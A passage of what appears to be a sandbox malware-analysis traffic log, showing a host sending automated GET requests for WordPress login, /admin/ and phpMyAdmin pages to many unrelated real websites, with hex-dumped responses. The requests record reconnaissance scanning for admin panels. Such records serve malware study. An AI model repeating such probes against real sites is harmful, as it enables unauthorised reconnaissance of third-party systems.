6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 67 6c 61 7a 69 Data Ascii: p-content/uploads/glazing-valeurs.jpg 500w, https://www.glazing-bt.com/wp-content/uploads/glazing-valeurs-270x300.jpg 270w, https://www.glazing-bt.com/wp-content/uploads/glazing-valeurs-132x146.jpg 132w, https://www.glazing-bt.com/wp-content/uploads/glazi

Session ID	Source IP	Source Port	Destination IP	Destination Port
276	192.168.2.6	55819	13.248.243.5	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:19 UTC	209	OUT	GET /admin/ HTTP/1.1 Host: strategicimpact.com.au Accept: / Accept-Encoding: deflate, gzip Cookie: dps_site_id=us-east-1 User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:19 UTC	288	IN	HTTP/1.1 404 Not Found Content-Type: text/html;charset=utf-8 Content-Length: 964 Vary: Accept-Encoding Server: DPS/2.0.0+sha-c81b86d X-Version: c81b86d X-SiteId: us-east-1 Set-Cookie: dps_site_id=us-east-1; path=/; secure Date: Tue, 20 Feb 2024 23:26:19 GMT Connection: close
2024-02-20 23:26:19 UTC	964	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 69 6d 67 31 2e 77 73 69 6d 67 2e 63 6f 6d 2f 64 70 73 2f 63 73 73 2f 75 78 63 6f Data Ascii: <!DOCTYPE html><html><head> <title>404 Not Found</title> <meta http-equiv="content-type" content="text/html; charset=utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <link href="//img1.wsimg.com/dps/css/uxco

Session ID	Source IP	Source Port	Destination IP	Destination Port
277	192.168.2.6	56109	104.21.54.169	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:19 UTC	185	OUT	GET /wp-login.php HTTP/1.1 Host: fortressrealcapital.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:20 UTC	808	IN	HTTP/1.1 200 OK Date: Tue, 20 Feb 2024 23:26:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 x-frame-options: SAMEORIGIN set-cookie: wordpress_test_cookie=WP%20Cookie%20check; path=/; secure vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=hPFo5MagLqmxV5%2Fu5d8CpuLTqTgJ2NHGltxuOXe2%2BlMpFrzkQESOFi%2F7KojwtXOOcMRj63rVVzTmybRxsh169uXMPJTai9sKheoy9RvWhBEFuvb%2FuINx8NPgKYoYgKz2roK8pUd1%2BEHkYQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 858a838f9a451768-EWR alt-svc: h3=":443"; ma=86400
2024-02-20 23:26:20 UTC	561	IN	Data Raw: 31 61 30 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 4c 6f 67 20 49 6e 20 26 6c 73 61 71 75 6f 3b 20 46 6f 72 74 72 65 73 73 20 52 65 61 6c 20 43 61 70 69 74 61 6c 20 26 23 38 32 31 32 3b 20 57 6f 72 64 50 72 65 73 73 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 Data Ascii: 1a06<!DOCTYPE html><html lang="en-US"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Log In &lsaquo; Fortress Real Capital — WordPress</title><meta name='robots' content='noindex, follow' /><link rel='
2024-02-20 23:26:20 UTC	1369	IN	Data Raw: 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 66 6f 72 6d 73 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 72 74 72 65 73 73 72 65 61 6c 63 61 70 69 74 61 6c 2e 63 6f 6d 2f 77 70 2d 61 64 6d 69 6e 2f 63 73 73 2f 66 6f 72 6d 73 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 36 2e 34 2e 33 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 6c 31 30 6e 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 72 74 72 65 73 73 72 65 61 6c 63 61 70 69 74 61 6c 2e 63 6f 6d 2f 77 70 2d 61 64 6d 69 6e 2f 63 73 73 2f 6c 31 30 6e 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 36 2e 34 2e 33 27 20 74 79 70 65 3d 27 74 Data Ascii: ='stylesheet' id='forms-css' href='https://fortressrealcapital.com/wp-admin/css/forms.min.css?ver=6.4.3' type='text/css' media='all' /><link rel='stylesheet' id='l10n-css' href='https://fortressrealcapital.com/wp-admin/css/l10n.min.css?ver=6.4.3' type='t
2024-02-20 23:26:20 UTC	1369	IN	Data Raw: 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 6f 72 64 70 72 65 73 73 2e 6f 72 67 2f 22 3e 50 6f 77 65 72 65 64 20 62 79 20 57 6f 72 64 50 72 65 73 73 3c 2f 61 3e 3c 2f 68 31 3e 0a 09 0a 09 09 3c 66 6f 72 6d 20 6e 61 6d 65 3d 22 6c 6f 67 69 6e 66 6f 72 6d 22 20 69 64 3d 22 6c 6f 67 69 6e 66 6f 72 6d 22 20 61 63 74 69 6f 6e 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 72 74 72 65 73 73 72 65 61 6c 63 61 70 69 74 61 6c 2e 63 6f 6d 2f 77 70 2d 6c 6f 67 69 6e 2e 70 68 70 22 20 6d 65 74 68 6f 64 3d 22 70 6f 73 74 22 3e 0a 09 09 09 3c 70 3e 0a 09 09 09 09 3c 6c 61 62 65 6c 20 66 6f 72 3d 22 75 73 65 72 5f 6c 6f 67 69 6e 22 3e 55 73 65 72 6e 61 6d 65 20 6f 72 20 45 6d 61 69 6c 20 41 64 64 72 65 73 73 3c 2f 6c 61 62 65 6c 3e 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 Data Ascii: a href="https://wordpress.org/">Powered by WordPress</a></h1><form name="loginform" id="loginform" action="https://fortressrealcapital.com/wp-login.php" method="post"><p><label for="user_login">Username or Email Address</label><input ty
2024-02-20 23:26:20 UTC	1369	IN	Data Raw: 65 3d 22 31 22 20 2f 3e 0a 09 09 09 3c 2f 70 3e 0a 09 09 3c 2f 66 6f 72 6d 3e 0a 0a 09 09 09 09 09 3c 70 20 69 64 3d 22 6e 61 76 22 3e 0a 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 77 70 2d 6c 6f 67 69 6e 2d 6c 6f 73 74 2d 70 61 73 73 77 6f 72 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 72 74 72 65 73 73 72 65 61 6c 63 61 70 69 74 61 6c 2e 63 6f 6d 2f 77 70 2d 6c 6f 67 69 6e 2e 70 68 70 3f 61 63 74 69 6f 6e 3d 6c 6f 73 74 70 61 73 73 77 6f 72 64 22 3e 4c 6f 73 74 20 79 6f 75 72 20 70 61 73 73 77 6f 72 64 3f 3c 2f 61 3e 09 09 09 3c 2f 70 3e 0a 09 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 2f 2a 20 3c 21 5b 43 44 41 54 41 5b 20 2a 2f 0a 66 75 6e 63 74 69 6f 6e 20 77 70 5f 61 74 74 65 6d Data Ascii: e="1" /></p></form><p id="nav"><a class="wp-login-lost-password" href="https://fortressrealcapital.com/wp-login.php?action=lostpassword">Lost your password?</a></p><script type="text/javascript">/* <![CDATA[ */function wp_attem
2024-02-20 23:26:20 UTC	1369	IN	Data Raw: 33 2e 31 2e 32 22 20 69 64 3d 22 77 70 2d 70 6f 6c 79 66 69 6c 6c 2d 69 6e 65 72 74 2d 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 72 74 72 65 73 73 72 65 61 6c 63 61 70 69 74 61 6c 2e 63 6f 6d 2f 77 70 2d 69 6e 63 6c 75 64 65 73 2f 6a 73 2f 64 69 73 74 2f 76 65 6e 64 6f 72 2f 72 65 67 65 6e 65 72 61 74 6f 72 2d 72 75 6e 74 69 6d 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 30 2e 31 34 2e 30 22 20 69 64 3d 22 72 65 67 65 6e 65 72 61 74 6f 72 2d 72 75 6e 74 69 6d 65 2d 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 Data Ascii: 3.1.2" id="wp-polyfill-inert-js"></script><script type="text/javascript" src="https://fortressrealcapital.com/wp-includes/js/dist/vendor/regenerator-runtime.min.js?ver=0.14.0" id="regenerator-runtime-js"></script><script type="text/javascript" src="http
2024-02-20 23:26:20 UTC	633	IN	Data Raw: 72 73 63 6f 72 65 2d 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 69 64 3d 22 77 70 2d 75 74 69 6c 2d 6a 73 2d 65 78 74 72 61 22 3e 0a 2f 2a 20 3c 21 5b 43 44 41 54 41 5b 20 2a 2f 0a 76 61 72 20 5f 77 70 55 74 69 6c 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 61 6a 61 78 22 3a 7b 22 75 72 6c 22 3a 22 5c 2f 77 70 2d 61 64 6d 69 6e 5c 2f 61 64 6d 69 6e 2d 61 6a 61 78 2e 70 68 70 22 7d 7d 3b 0a 2f 2a 20 5d 5d 3e 20 2a 2f 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 72 74 72 65 73 73 72 65 61 6c 63 61 70 69 74 61 6c 2e 63 6f 6d 2f 77 70 2d 69 6e 63 6c Data Ascii: rscore-js"></script><script type="text/javascript" id="wp-util-js-extra">/* <![CDATA[ /var _wpUtilSettings = {"ajax":{"url":"\/wp-admin\/admin-ajax.php"}};/ ... */</script><script type="text/javascript" src="https://fortressrealcapital.com/wp-incl
2024-02-20 23:26:20 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
278	192.168.2.6	56046	15.161.71.77	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:20 UTC	183	OUT	GET /PhpMyAdmin/ HTTP/1.1 Host: iisalessandrini.edu.it Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:20 UTC	443	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:20 GMT Server: Apache Strict-Transport-Security: max-age=31536000; includeSubDomains X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff X-XSS-Protection: 0 X-Permitted-Cross-Domain-Policies: none Referrer-Policy: same-origin Location: https://iisalessandrini.edu.it/PhpMyAdmin Content-Length: 249 Connection: close Content-Type: text/html; charset=iso-8859-1
2024-02-20 23:26:20 UTC	249	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 69 69 73 61 6c 65 73 73 61 6e 64 72 69 6e 69 2e 65 64 75 2e 69 74 2f 50 68 70 4d 79 41 64 6d 69 6e 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://iisalessandrini.edu.it/PhpMyAdmin">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
279	192.168.2.6	56178	162.0.235.125	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:20 UTC	183	OUT	GET /wp-login.php HTTP/1.1 Host: norwegischlernen.info Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:20 UTC	408	IN	HTTP/1.1 200 OK keep-alive: timeout=5, max=100 expires: Wed, 11 Jan 1984 05:00:00 GMT cache-control: no-cache, must-revalidate, max-age=0 content-type: text/html; charset=UTF-8 set-cookie: wordpress_test_cookie=WP+Cookie+check; path=/; secure x-frame-options: SAMEORIGIN content-length: 5377 date: Tue, 20 Feb 2024 23:26:20 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed connection: close
2024-02-20 23:26:20 UTC	5377	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 4c 6f 67 20 49 6e 20 26 6c 73 61 71 75 6f 3b 20 6e 6f 72 77 65 67 69 73 63 68 6c 65 72 6e 65 6e 2e 69 6e 66 6f 20 26 23 38 32 31 32 3b 20 57 6f 72 64 50 72 65 73 73 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 2c 20 6e 6f 69 6e 64 65 78 2c 20 6e 6f 61 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Log In &lsaquo; norwegischlernen.info — WordPress</title><meta name='robots' content='max-image-preview:large, noindex, noa

Session ID	Source IP	Source Port	Destination IP	Destination Port
280	192.168.2.6	56134	185.39.146.199	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:20 UTC	176	OUT	GET /PhpMyAdmin/ HTTP/1.1 Host: www.markoren.no Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:20 UTC	735	IN	HTTP/1.1 404 Not Found date: Tue, 20 Feb 2024 23:26:20 GMT expires: Thu, 19 Nov 1981 08:52:00 GMT cache-control: no-store, no-cache, must-revalidate pragma: no-cache set-cookie: PHPSESSID=jrshqblhefuuu1dkl53sk7h65m; expires=Fri, 10-Jun-2078 22:52:40 GMT; Max-Age=1713655580; path=/; secure; HttpOnly; SameSite=None access-control-allow-origin: * access-control-allow-methods: GET,POST,OPTIONS,DELETE,PUT access-control-allow-headers: X-Requested-With, Content-Type, Origin, Cache-Control, Pragma, Authorization, Accept, Accept-Encoding, token content-type: text/html; charset=iso-8859-1 x-backend: server1 x-type: customer x-varnish: 949056561 age: 0 transfer-encoding: chunked x-server: varnish-2 connection: close
2024-02-20 23:26:20 UTC	5073	IN	Data Raw: 31 33 43 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6e 6f 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 09 3c 74 69 74 6c 65 3e 20 4d 61 72 6b f8 72 65 6e 20 52 65 6b 6c 61 6d 65 20 41 53 20 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 Data Ascii: 13C9<!DOCTYPE html><html lang="no"><head><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no"><title> Markren Reklame AS </title><meta name
2024-02-20 23:26:20 UTC	8696	IN	Data Raw: 32 31 46 30 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 55 52 4c 5f 53 54 41 54 49 43 53 45 52 56 45 52 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 75 6e 70 72 2e 69 6f 22 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 55 52 4c 5f 49 4d 41 47 45 53 45 52 56 45 52 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 75 6e 70 72 2e 69 6f 22 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 55 52 4c 5f 41 50 49 3d 22 68 74 74 70 73 3a 2f 2f 61 70 69 2e 75 6e 69 74 65 64 70 72 6f 66 69 6c 65 2e 63 6f 6d 22 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 Data Ascii: 21F0 }; window.URL_STATICSERVER="https://static.unpr.io"; window.URL_IMAGESERVER="https://static.unpr.io"; window.URL_API="https://api.unitedprofile.com"; </script>
2024-02-20 23:26:20 UTC	2893	IN	Data Raw: 42 34 36 0d 0a 61 74 61 2d 66 69 6c 74 65 72 73 3d 22 74 72 75 65 22 3e 0a 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 76 61 6c 75 65 3d 22 73 6f 65 6b 22 20 69 64 3d 22 73 72 63 68 78 76 22 20 6e 61 6d 65 3d 22 78 76 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 6e 70 75 74 2d 67 72 6f 75 70 22 3e 0a 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 76 61 6c 75 65 3d 22 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 f8 6b 20 62 6c 61 6e 64 74 20 31 30 30 30 2d 76 69 73 20 61 76 20 70 72 6f 64 75 6b 74 65 72 22 20 63 6c 61 73 73 3d 22 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 22 20 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 6f 66 66 22 20 69 64 3d 22 73 65 61 72 63 68 22 20 6e 61 6d 65 3d 22 73 65 61 72 63 68 22 3e 0a 3c 73 70 61 Data Ascii: B46ata-filters="true"><input type="hidden" value="soek" id="srchxv" name="xv"><div class="input-group"><input type="text" value="" placeholder="Sk blandt 1000-vis av produkter" class="form-control" autocomplete="off" id="search" name="search"><spa
2024-02-20 23:26:20 UTC	16318	IN	Data Raw: 33 46 42 36 0d 0a 65 72 5f 70 69 6e 6b 20 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 70 69 6e 6b 3b 22 20 6f 6e 63 6c 69 63 6b 3d 22 66 69 6c 74 65 72 73 2e 73 65 74 5f 63 6f 6c 6f 72 28 31 31 2c 74 68 69 73 29 3b 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 6c 79 70 68 69 63 6f 6e 20 67 6c 79 70 68 69 63 6f 6e 2d 6f 6b 22 3e 3c 2f 73 70 61 6e 3e a0 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 73 65 61 72 63 68 20 63 6f 6c 66 69 6c 74 65 72 5f 62 72 6f 77 6e 20 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 62 72 6f 77 6e 3b 22 20 6f 6e 63 6c 69 63 6b 3d 22 66 69 6c 74 65 72 73 2e 73 65 74 5f 63 6f 6c 6f 72 28 37 2c 74 68 69 73 29 3b 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 6c 79 70 68 Data Ascii: 3FB6er_pink " style="background:pink;" onclick="filters.set_color(11,this);"><span class="glyphicon glyphicon-ok"></span></div><div class="colsearch colfilter_brown " style="background:brown;" onclick="filters.set_color(7,this);"><span class="glyph
2024-02-20 23:26:20 UTC	9752	IN	Data Raw: 32 36 31 30 0d 0a 66 3d 22 2f 73 6f 72 74 69 6d 65 6e 74 2f 6d 65 72 6b 65 76 61 72 65 72 2f 72 65 67 61 74 74 61 22 3e 52 65 67 61 74 74 61 26 23 30 31 37 34 3b 3c 2f 61 3e 3c 2f 6c 69 3e 0a 0a 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 73 6f 72 74 69 6d 65 6e 74 2f 6d 65 72 6b 65 76 61 72 65 72 2f 72 6f 74 72 69 6e 67 22 3e 52 6f 74 72 69 6e 67 3c 2f 61 3e 3c 2f 6c 69 3e 0a 0a 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 73 6f 72 74 69 6d 65 6e 74 2f 6d 65 72 6b 65 76 61 72 65 72 2f 72 75 73 73 65 6c 6c 22 3e 52 75 73 73 65 6c 6c 3c 2f 61 3e 3c 2f 6c 69 3e 0a 0a 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 73 6f 72 74 69 6d 65 6e 74 2f 6d 65 72 6b 65 76 61 72 65 72 2f 73 6f 2d 64 65 6e 69 6d 22 3e 53 6f 20 44 65 6e 69 6d 3c 2f 61 3e 3c 2f 6c 69 3e 0a 0a 3c 6c Data Ascii: 2610f="/sortiment/merkevarer/regatta">Regatta®</a></li><li><a href="/sortiment/merkevarer/rotring">Rotring</a></li><li><a href="/sortiment/merkevarer/russell">Russell</a></li><li><a href="/sortiment/merkevarer/so-denim">So Denim</a></li><l
2024-02-20 23:26:20 UTC	1455	IN	Data Raw: 35 41 38 0d 0a 22 6d 6f 64 61 6c 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 6f 64 61 6c 2d 68 65 61 64 65 72 22 3e 0a 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 20 63 6c 61 73 73 3d 22 63 6c 6f 73 65 22 20 64 61 74 61 2d 64 69 73 6d 69 73 73 3d 22 6d 6f 64 61 6c 22 3e 3c 73 70 61 6e 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 3e d7 3c 2f 73 70 61 6e 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 72 2d 6f 6e 6c 79 22 3e 43 6c 6f 73 65 3c 2f 73 70 61 6e 3e 3c 2f 62 75 74 74 6f 6e 3e 0a 3c 68 34 20 63 6c 61 73 73 3d 22 6d 6f 64 61 6c 2d 74 69 74 6c 65 22 20 69 64 3d 22 63 61 72 74 4c 69 73 74 4d 6f 64 61 6c 4c 61 62 65 6c 22 3e 48 61 6e 64 6c 65 6b 75 72 76 3c 2f 68 34 3e 0a 3c 2f 64 69 76 3e 0a 3c Data Ascii: 5A8"modal-content"><div class="modal-header"><button type="button" class="close" data-dismiss="modal"><span aria-hidden="true"></span><span class="sr-only">Close</span></button><h4 class="modal-title" id="cartListModalLabel">Handlekurv</h4></div><
2024-02-20 23:26:20 UTC	2271	IN	Data Raw: 38 44 33 0d 0a 2e 6b 65 79 70 72 65 73 73 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 63 6f 64 65 3d 65 2e 77 68 69 63 68 3b 69 66 28 63 6f 64 65 3d 3d 31 33 29 65 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 3b 69 66 28 63 6f 64 65 3d 3d 31 33 29 7b 20 0a 24 28 27 23 69 6e 64 65 78 53 65 61 72 63 68 46 6f 72 6d 27 29 2e 73 75 62 6d 69 74 28 29 3b 7d 7d 29 3b 7d 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 0a 0a 0a 0a 0a 09 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 31 32 22 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 65 6c 6c 22 3e 0a 0a 09 09 09 3c 68 31 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 Data Ascii: 8D3.keypress(function(e){var code=e.which;if(code==13)e.preventDefault();if(code==13){ $('#indexSearchForm').submit();}});});</script><div class="container"><div class="row"><div class="col-md-12"><div class="well"><h1 style="font-s

Session ID	Source IP	Source Port	Destination IP	Destination Port
281	192.168.2.6	56240	86.105.245.69	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:20 UTC	216	OUT	GET / HTTP/1.1 Host: www.stylesense.co.uk Accept: / Accept-Encoding: deflate, gzip Cookie: PHPSESSID=mruul8ldluhskqv1trt26ro4uj User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
